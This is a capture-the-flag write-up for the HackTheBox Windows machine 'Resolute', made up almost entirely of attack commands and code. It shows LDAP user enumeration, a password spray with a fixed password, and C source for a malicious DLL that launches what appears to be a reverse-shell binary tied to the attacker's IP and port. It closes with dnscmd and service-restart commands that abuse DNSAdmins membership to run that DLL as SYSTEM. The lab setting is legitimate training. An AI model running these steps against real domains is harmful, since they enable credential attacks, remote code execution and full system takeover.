Post

Resolute @ HackTheBox

Resolute @ HackTheBox

Resolute is a 30-point Windows machine on HackTheBox that involves enumerating LDAP, Password Spraying, and using the DNSAdmins group to register a custom plugin DLL which allows us to execute code as SYSTEM.

Notes

Windapsearch

1
2
3
4
windapsearch --dc resolute.htb -m users
windapsearch --dc resolute.htb -m users --full
windapsearch --dc resolute.htb -m users --attrs description
windapsearch --dc resolute.htb -m users --attrs sAMAccountName | grep sAMAccountName | cut -d " " -f2 | tee users.txt

https://github.com/ropnop/windapsearch

Kerbrute

1
kerbrute passwordspray -d megabank.local --dc resolute.htb users.txt 'Welcome123!'

https://github.com/ropnop/kerbrute

DNSAdmins Exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#include "pch.h"

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        WinExec("C:\\programdata\\xc_10.10.14.4_1337.exe", 0);
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
1
2
3
4
dnscmd resolute /config /serverlevelplugindll c:\programdata\xct.dll
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
sc.exe \\resolute stop dns
sc.exe \\resolute start dns

Thanks egre55 for creating this fun box!

This post is licensed under CC BY 4.0 by the author.